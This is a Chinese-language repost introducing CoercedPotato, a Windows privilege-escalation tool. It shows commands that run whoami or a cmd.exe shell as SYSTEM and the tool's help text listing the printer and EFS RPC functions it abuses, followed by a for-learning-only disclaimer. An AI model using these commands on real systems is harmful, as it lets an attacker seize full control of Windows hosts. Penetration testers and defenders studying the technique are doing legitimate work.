工具简介
工具使用
非常快速POC:.\CoercedPotato.exe -c whoami交互式shell的PoC:.\CoercedPotato.exe -c cmd.exe
可以使用--help选项检查帮助消息。
CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.Usage: .\CoercedPotato.exe [OPTIONS]Options:-h,--help Print this help message and exit-c,--command TEXT REQUIRED Program to execute as SYSTEM (i.e. cmd.exe)-i,--interface TEXT Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr-n,--exploitId INT Optionnal exploit ID (Only usuable if interface is defined)-> ms-rprn :[0] RpcRemoteFindFirstPrinterChangeNotificationEx()[1] RpcRemoteFindFirstPrinterChangeNotification()-> ms-efsr[0] EfsRpcOpenFileRaw()[1] EfsRpcEncryptFileSrv()[2] EfsRpcDecryptFileSrv()[3] EfsRpcQueryUsersOnFile()[4] EfsRpcQueryRecoveryAgents()[5] EfsRpcRemoveUsersFromFile()[6] EfsRpcAddUsersToFile()[7] EfsRpcFileKeyInfo() # NOT WORKING[8] EfsRpcDuplicateEncryptionInfoFile()[9] EfsRpcAddUsersToFileEx()[10] EfsRpcFileKeyInfoEx() # NOT WORKING[11] EfsRpcGetEncryptedFileMetadata()[12] EfsRpcEncryptFileExSrv()[13] EfsRpcQueryProtectors()-f,--force BOOLEAN Force all RPC functions even if it says 'Exploit worked!' (Default value : false)--interactive BOOLEAN Set wether the process should be run within the same shell or open a new window. (Default value : true)
下载地址
文章来源:潇湘信安
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650583517&idx=4&sn=8db085704387e1708a3115f1f9c6713e&chksm=83bdd439b4ca5d2fef070f8cc293658843ab07cdb287126b0fb0bfc07752286f63928058ae28&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh